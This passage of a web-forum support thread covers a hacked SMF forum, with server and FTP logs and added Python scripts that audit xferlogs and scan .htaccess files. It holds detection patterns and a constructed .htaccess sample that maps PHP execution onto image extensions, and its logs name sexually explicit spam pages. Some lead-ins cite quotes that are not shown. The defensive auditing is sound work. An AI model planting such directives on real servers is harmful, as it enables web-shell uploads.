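Sat Feb 7 03:04:44 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ d r user ftp 0 * c
Sat Feb 7 03:10:12 2009 0 201.255.169.142 4410 /mysite.com/robotforum/ssi_examples.php b _ i a anonymous ftp 0 * c
Sat Feb 7 09:15:02 2009 1 192.0.2.10 4096 /mysite.com/images/logo.png b _ i r user ftp 0 * c
"""


def parse_xferlog(text):
    """Parse wu-ftpd/ProFTPD xferlog lines (file names without spaces assumed), oldest first."""
    entries = []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 18:
            continue
        entries.append({
            'time': datetime.strptime(' '.join(t[:5]), '%a %b %d %H:%M:%S %Y'),
            'host': t[6], 'size': int(t[7]), 'path': t[8],
            'direction': t[11],  # i = upload to server, o = download, d = delete
            'access': t[12],     # a = anonymous, g = guest, r = real account
            'user': t[13], 'status': t[17],
        })
    return sorted(entries, key=lambda e: e['time'])


def find_capability_probes(entries, window_seconds=600, min_langs=3):
    """One host uploading the same stem under several script extensions inside a short window."""
    by_key = defaultdict(list)
    for e in entries:
        stem, ext = splitext(basename(e['path']))
        if e['direction'] == 'i' and ext.lower() in SCRIPT_EXTS:
            by_key[(e['host'], stem)].append(e)
    probes = []
    for (host, stem), ups in by_key.items():
        exts = sorted({splitext(e['path'])[1].lower() for e in ups})
        span = (ups[-1]['time'] - ups[0]['time']).total_seconds()
        if len(exts) >= min_langs and span <= window_seconds:
            probes.append({'host': host, 'stem': stem, 'extensions': exts, 'span_seconds': span})
    return probes


def find_upload_delete_pairs(entries, max_gap_seconds=60):
    """Uploads removed again within seconds: the file lived only long enough to be fetched over HTTP."""
    pending, pairs = {}, []
    for e in entries:
        key = (e['host'], e['path'])
        if e['direction'] == 'i':
            pending[key] = e
        elif e['direction'] == 'd' and key in pending:
            gap = (e['time'] - pending.pop(key)['time']).total_seconds()
            if gap <= max_gap_seconds:
                pairs.append({'host': e['host'], 'path': e['path'], 'gap_seconds': gap})
    return pairs


def surviving_script_uploads(entries):
    """Script files uploaded and never deleted: these are the ones to look for on disk first."""
    live = {}
    for e in entries:
        if splitext(e['path'])[1].lower() not in SCRIPT_EXTS:
            continue
        if e['direction'] == 'i':
            live[e['path']] = e['time']
        elif e['direction'] == 'd':
            live.pop(e['path'], None)
    return sorted(live)


def anonymous_uploads(entries):
    """Any upload over an anonymous login is a finding by itself."""
    return [e for e in entries if e['direction'] == 'i' and e['access'] == 'a']


if __name__ == '__main__':
    log = parse_xferlog(SAMPLE_XFERLOG)
    print('probes:', find_capability_probes(log))
    print('short-lived uploads:', len(find_upload_delete_pairs(log)))
    print('still on disk:', surviving_script_uploads(log))
    print('anonymous uploads:', [e['path'] for e in anonymous_uploads(log)])
```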

societyofrobots

Since I spent the last week learning tons about web security, I figured I'd write up a 'website security for noobs' article. Besides, our forums are about our hobbies/interests, not web security expertise!

http://www.societyofrobots.com/misc_hackproof.shtml

Hope that saves other noobs like me the pain of being hacked . . . and for the experts here, feel free to chime in.

Quote
I would report the intrusion to the FBI and retain any logs. Also, I would make a direct complaint to the isp behind it.
Police in even the most advanced countries would care less unless several million dollars were somehow involved in the hack. I emailed the ISP, it returned an 'email does not exist' error. WWW means wild west world, everyone for themselves . . . In the 3rd world you have to bribe police to get any investigation/arrests done - the internet is a 3rd world country in my opinion. Rampant crime, dysfunctional 'government', poor organization, censorship . . . but I digress . . .



I'm pretty sure SMF is clean now, more worried about other hidden server level files.

Quote
We also should check the database (forum) for any HTML (scripting) that has been added to steal your cookies. - again, the chance of this is generally pretty low,and its a bit of work, but this guy is obviously a professional who knows what he's about - and so should you!
...SMF doesn't disable HTML in headings like forum headings/names, so, if as a backdoor person he gave himself admin privileges, he COULD have edited some headings to call nasty scripts (this is easy to check: a quick MySQL query for '<' and its entity equivalent should suffice).
How would you recommend checking the forum DB? Just that one search? I did that search, but it was pretty useless:
1 match(es) inside table smf_settings
1899 match(es) inside table smf_personal_messages
38819 match(es) inside table smf_messages
67 match(es) inside table smf_members
20 match(es) inside table smf_log_errors
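The .htaccess check quoted above (a directive that makes the web server run .gif files as PHP, followed by an "avatar" that is really a script) is mechanical enough to script. Here is an added audit, not from the thread or from SMF, that flags handler and engine directives in any .htaccess under an upload directory and compares each file's leading bytes with what its extension promises; the .htaccess text and the three files are constructed samples, not SMF's shipped files.

```python
import os
import re

# Directives that turn "data" files into executable ones. Any of these in an
# attachments or avatars directory deserves a manual look.
SUSPECT_DIRECTIVES = [
    (re.compile(r'^(AddHandler|AddType)\s+\S*php\S*\s+', re.I), 'PHP handler mapped to extra extensions'),
    (re.compile(r'^(SetHandler|ForceType)\s+\S*php', re.I), 'everything in scope executed as PHP'),
    (re.compile(r'^AddHandler\s+cgi-script', re.I), 'CGI handler mapped'),
    (re.compile(r'^Options\b.*ExecCGI', re.I), 'CGI execution enabled'),
    (re.compile(r'^php_(flag|value|admin_flag|admin_value)\s+engine\s+on', re.I), 'PHP engine switched on'),
    (re.compile(r'^php_(value|admin_value)\s+auto_(prepend|append)_file', re.I), 'auto_prepend/append file set'),
]

# Leading bytes of the image types normally found in avatar/attachment folders.
IMAGE_MAGIC = {
    '.gif': (b'GIF87a', b'GIF89a'),
    '.jpg': (b'\xff\xd8\xff',),
    '.jpeg': (b'\xff\xd8\xff',),
    '.png': (b'\x89PNG\r\n\x1a\n',),
}
PHP_MARKERS = (b'<?php', b'<?=', b'<script language="php"')

# Constructed samples: an access-only .htaccess with two dangerous lines appended,
# a real GIF, a PHP file named like a GIF, and a PNG stored under a .jpg name.
SAMPLE_HTACCESS = """\
# constructed sample: an access-control-only file with two planted directives
<Files *>
    Order Deny,Allow
    Deny from all
    Allow from localhost
</Files>
AddHandler application/x-httpd-php .gif .jpg
php_flag engine on
"""
SAMPLE_FILES = {
    'avatar_12.gif': b'GIF89a' + b'\x00' * 20,
    'avatar_13.gif': b'<?php /* constructed: script disguised as an image */ ?>',
    'photo.jpg': b'\x89PNG\r\n\x1a\n' + b'\x00' * 20,
}


def audit_htaccess(text):
    """Return (line_no, line, reason) for every directive that could enable code execution."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        for rx, why in SUSPECT_DIRECTIVES:
            if rx.search(line):
                findings.append((n, line, why))
                break
    return findings


def check_file_content(name, head):
    """Reason string if the first bytes of a file do not fit its extension, else None."""
    ext = os.path.splitext(name)[1].lower()
    if any(marker in head for marker in PHP_MARKERS):
        return 'contains PHP open tag'
    magics = IMAGE_MAGIC.get(ext)
    if magics and not head.startswith(magics):
        return 'magic bytes do not match %s' % ext
    return None


def audit_tree(root):
    """Walk an upload directory; return (path, reason) for anything that needs review."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, 'rb') as fh:
                head = fh.read(4096)
            if fname == '.htaccess':
                for n, line, why in audit_htaccess(head.decode('utf-8', 'replace')):
                    results.append((path, 'line %d: %s (%s)' % (n, why, line)))
            else:
                why = check_file_content(fname, head)
                if why:
                    results.append((path, why))
    return results


def demo():
    """Write the constructed samples into a temp directory and audit it; returns sorted reasons."""
    import tempfile
    root = tempfile.mkdtemp()
    with open(os.path.join(root, '.htaccess'), 'w') as fh:
        fh.write(SAMPLE_HTACCESS)
    for name, data in SAMPLE_FILES.items():
        with open(os.path.join(root, name), 'wb') as fh:
            fh.write(data)
    return sorted(reason for _, reason in audit_tree(root))


if __name__ == '__main__':
    for reason in demo():
        print(reason)
```

Run audit_tree against the attachments and avatars directories and diff every flagged .htaccess against the copy in a fresh SMF download, as !wooha suggests.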

karlbenson

Since this doesn't appear to be an actual bug, I'm moving this to the 1.1.x support area.

It may get a bit more attention there for any remaining issues you have in getting your old forum back to normal again.

societyofrobots

Good news, sorta. My logs show the hacker trying to hack me again with the same old method. This time it's not sticking. I'm pretty sure it was the Plesk exploit that got me. This is what my logs now say:

Quote
[Mon Apr 06 13:27:36 2009] [error] [client 59.56.110.150] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:37 2009] [error] [client 59.56.110.150] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:42 2009] [error] [client 59.56.110.150] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:43 2009] [error] [client 59.56.110.150] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:31:16 2009] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
[Mon Apr 06 13:31:21 2009] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/forum/global.php' not found or unable to stat
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/global.php' not found or unable to stat
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/global.php' not found or unable to stat
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/forum/global.php' not found or unable to stat
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/global.php' not found or unable to stat
[client 211.239.167.237] script '/var/www/vhosts/my_site.com/httpdocs/forum/global.php' not found or unable to stat

JBlaze

societyofrobots, is this issue resolved now? If not, please provide some details of the issue.
Jason Clemons
Former Team Member 2009 - 2012

societyofrobots

So I got hacked again after updating Plesk, so apparently it's not Plesk that's the hole. It appears it's actually SMF that's the problem, but not really sure how. They somehow get FTP access, so I turn off FTP now whenever I'm not using it.

It also appears to be multiple hackers doing it, with dozens of IP addresses, as the attack style and spam posted up is different. This leads me to believe it's a known and common exploit being used on popular software . . .


Anyway, here are my logs from the latest hack below. I filtered them and left the interesting stuff:
Quote
//billions of these!
[Thu Apr 16 23:20:05 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:06 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:07 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:08 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:08 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:09 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:10 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:10 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:11 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:16 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:17 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:18 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:19 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:20 2009] [error] [client 118.98.177.130] request failed: error reading the headers

[client 69.65.19.207] script '/var/www/vhosts/my_site.com/httpdocs/index.php' not found or unable to stat
[Fri Apr 17 23:24:24 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:25 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:25 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:29 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi


[client 211.172.225.50] script '/var/www/vhosts/my_site.com/httpdocs/detail.php' not found or unable to stat

[client 118.219.232.137] script '/var/www/vhosts/my_site.com/httpdocs/index.php' not found or unable to stat

[Sun Apr 19 20:10:40 2009] [error] [client 190.17.80.129] File does not exist: /var/www/vhosts/my_site.com/httpdocs/ladies
[Sun Apr 19 20:15:26 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Sun Apr 19 20:21:09 2009] [error] [client 65.55.209.30] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/_img

[client 212.241.182.242] script '/var/www/vhosts/my_site.com/httpdocs/products.php' not found or unable to stat
[client 212.241.182.242] script '/var/www/vhosts/my_site.com/httpdocs/forum/products.php' not found or unable to stat

[Sun Apr 19 21:51:39 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/Consortium
[Sun Apr 19 21:58:27 2009] [error] [client 193.47.80.44] File does not exist: /var/www/vhosts/my_site.com/httpdocs/Library


[Sun Apr 19 22:26:50 2009] [error] [client 70.78.72.188] Invalid URI in request %3A%22646c14d465e47ba21040ae65bbd7746ac8d5004c%22%3Bi%3A2%3Bi%3A1429421156%3Bi%3A3%3Bi%3A0%3B%7D; PHPSESSID=ffe0e2e3de55e43a82f25c87ead23e59; __utma=53814186.1704686547.1240208609.1240208609.1240208609.1; __utmb=53814186; __utmc=53814186; __utmz=53814186.1240208609.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

[Mon Apr 20 00:12:29 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/administrator
[Mon Apr 20 00:12:29 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/administrator
[Mon Apr 20 00:12:34 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/administrator
[Mon Apr 20 00:12:34 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/administrator

[client 208.74.66.43] script '/var/www/vhosts/my_site.com/httpdocs/phpinfo.php' not found or unable to stat

[Mon Apr 20 03:06:38 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 03:10:11 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 03:13:20 2009] [error] [client 121.101.159.16] File does not exist: /var/www/vhosts/my_site.com/httpdocs/components
[Mon Apr 20 03:13:20 2009] [error] [client 121.101.159.16] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/components
[Mon Apr 20 03:29:58 2009] [error] [client 208.116.45.210] File does not exist: /var/www/vhosts/my_site.com/httpdocs/components

[Mon Apr 20 05:19:21 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/at_domains__index.html
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[Mon Apr 20 05:21:54 2009] [error] [client 115.178.120.133] File does not exist: /var/www/vhosts/my_site.com/httpdocs/(null)
[Mon Apr 20 05:22:22 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images

[Mon Apr 20 05:35:42 2009] [error] [client 62.171.194.9] File does not exist: /var/www/vhosts/my_site.com/httpdocs/_vti_bin
[Mon Apr 20 05:35:43 2009] [error] [client 62.171.194.9] File does not exist: /var/www/vhosts/my_site.com/httpdocs/MSOffice

[client 69.89.31.173] script '/var/www/vhosts/my_site.com/httpdocs/errors.php' not found or unable to stat
[client 69.89.31.173] script '/var/www/vhosts/my_site.com/httpdocs/forum/errors.php' not found or unable to stat

[Mon Apr 20 07:59:59 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 08:00:16 2009] [error] [client 66.249.70.108] File does not exist: /var/www/vhosts/my_site.com/httpdocs/ladies


And my unexplained FTP logs (short summary):

Quote
hack started April 16th 2008, and files uploaded on 18th

Thu Apr 16 20:32:58 2009 0 94.236.129.194 32 /var/www/vhosts/my_site.com/httpdocs/testfile123.html b _ i r socie2 ftp 0 * c
Thu Apr 16 20:33:24 2009 0 94.236.129.194 32 /var/www/vhosts/my_site.com/httpdocs/testfile123.html b _ d r socie2 ftp 0 * c
Thu Apr 16 21:07:58 2009 0 71.201.58.77 32 /var/www/vhosts/my_site.com/httpdocs/ladies/testfile123.html b _ i r socie2 ftp 0 * c
Thu Apr 16 21:08:01 2009 0 71.201.58.77 32 /var/www/vhosts/my_site.com/httpdocs/ladies/testfile123.html b _ d r socie2 ftp 0 * c
Thu Apr 16 21:08:03 2009 0 71.201.58.77 795 /var/www/vhosts/my_site.com/httpdocs/ladies/b282a0a7e598.php b _ i r socie2 ftp 0 * c
Thu Apr 16 21:08:04 2009 0 71.201.58.77 795 /var/www/vhosts/my_site.com/httpdocs/ladies/b282a0a7e598.php b _ d r socie2 ftp 0 * c
Sat Apr 18 07:03:55 2009 1 83.10.40.16 19694 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:03:58 2009 0 83.10.40.16 7025 /var/www/vhosts/my_site.com/httpdocs/ladies/index.css b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:00 2009 0 83.10.40.16 180 /var/www/vhosts/my_site.com/httpdocs/ladies/border_h.png b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:10 2009 7 83.10.40.16 105162 /var/www/vhosts/my_site.com/httpdocs/ladies/map.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:12 2009 0 83.10.40.16 3341 /var/www/vhosts/my_site.com/httpdocs/ladies/rss.png b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:15 2009 1 83.10.40.16 8998 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-bear-vagina.html b _ i r socie2 ftp 0 * c

Sat Apr 18 07:56:40 2009 1 62.221.111.249 7821 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-******-out.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:40 2009 0 88.158.221.98 872 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:42 2009 0 88.158.221.98 3220 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:44 2009 0 88.158.221.98 15035 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:46 2009 1 62.221.111.249 17189 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-on-black-dick.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:50 2009 0 88.158.221.98 17335 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:51 2009 0 88.158.221.98 6333 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:52 2009 1 62.221.111.249 10030 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-cock-spear-sucking.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:53 2009 0 88.158.221.98 8574 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:59 2009 1 62.221.111.249 11087 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-photo-nude.html b _ i r socie2 ftp 0 * c

Sat Apr 18 08:14:07 2009 1 62.221.111.249 14188 /var/www/vhosts/my_site.com/httpdocs/ladies/sex-with-underwear-on.html b _ i r socie2 ftp 0 * c
Sat Apr 18 15:07:31 2009 0 89.238.10.109 5817 /var/www/vhosts/my_site.com/httpdocs/index.shtml a _ o r socie2 ftp 0 * c
Sat Apr 18 15:07:41 2009 0 89.238.10.109 5979 /var/www/vhosts/my_site.com/httpdocs/index.shtml a _ i r socie2 ftp 0 * c
Sat Apr 18 15:07:52 2009 7 89.238.10.109 21907 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:03 2009 2 89.238.10.109 22047 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:06 2009 0 89.238.10.109 3220 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:09 2009 0 89.238.10.109 3123 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:15 2009 1 89.238.10.109 17335 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:23 2009 1 89.238.10.109 17354 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:34 2009 6 89.238.10.109 8574 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:37 2009 0 89.238.10.109 8689 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ i r socie2 ftp 0 * c
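The FTP log quoted above is in the standard xferlog format, and the interesting pattern in it is an existing page being downloaded (`o`) and re-uploaded (`i`) a few seconds later, slightly larger, by the same address. As an added example (not code from the thread or from SMF), this Python script parses that format and pulls out exactly those download-then-upload pairs, plus which addresses wrote under the account; the sample log is constructed with documentation-range addresses and neutral file names, and the account name `socie2` is copied from the thread.

```python
"""Post-compromise triage of an FTP transfer log in xferlog format.
Fields: day mon dd hh:mm:ss yyyy, secs, remote host, size, path, type,
flag, direction (i = upload, o = download, d = delete), mode, user, ...
Sample below is constructed (documentation-range addresses, neutral names)."""
from collections import defaultdict, namedtuple
from datetime import datetime

Xfer = namedtuple("Xfer", "when ip size path direction user")

SAMPLE_XFERLOG = """\
Thu Apr 16 20:32:58 2009 0 192.0.2.10 32 /var/www/vhosts/example.com/httpdocs/testfile123.html b _ i r socie2 ftp 0 * c
Thu Apr 16 20:33:24 2009 0 192.0.2.10 32 /var/www/vhosts/example.com/httpdocs/testfile123.html b _ d r socie2 ftp 0 * c
Sat Apr 18 07:56:40 2009 0 198.51.100.7 872 /var/www/vhosts/example.com/httpdocs/tutorials/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:42 2009 0 198.51.100.7 3220 /var/www/vhosts/example.com/httpdocs/tutorials/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:46 2009 1 203.0.113.9 17189 /var/www/vhosts/example.com/httpdocs/ladies/spam-page.html a _ i r socie2 ftp 0 * c
"""

def parse_xferlog(text):
    """Split each xferlog line into fields (paths without spaces, as in the thread)."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18: continue  # blank line or not in xferlog shape
        when = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
        records.append(Xfer(when, f[6], int(f[7]), f[8], f[11], f[13]))
    return records

def find_in_place_edits(records, window_seconds=120):
    """Pair a download (o) with a later upload (i) of the same path from the same
    address inside the window: a page fetched, injected, and pushed back."""
    edits, last_download = [], {}
    for r in sorted(records, key=lambda r: r.when):
        key = (r.ip, r.path)
        if r.direction == "o":
            last_download[key] = r
        elif r.direction == "i" and key in last_download:
            prev = last_download.pop(key)
            if (r.when - prev.when).total_seconds() <= window_seconds:
                edits.append((r.ip, r.path, r.size - prev.size))  # bytes added
    return edits

def writers_by_address(records):
    """Paths uploaded or deleted per remote address; many addresses writing under one account points to a leaked credential."""
    by_ip = defaultdict(set)
    for r in records:
        if r.direction in ("i", "d"):
            by_ip[r.ip].add(r.path)
    return {ip: sorted(paths) for ip, paths in by_ip.items()}
```

Run against the real log, the size difference in each pair is roughly how much was appended to the page, which is worth comparing with the length of the injected script block visitors reported.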
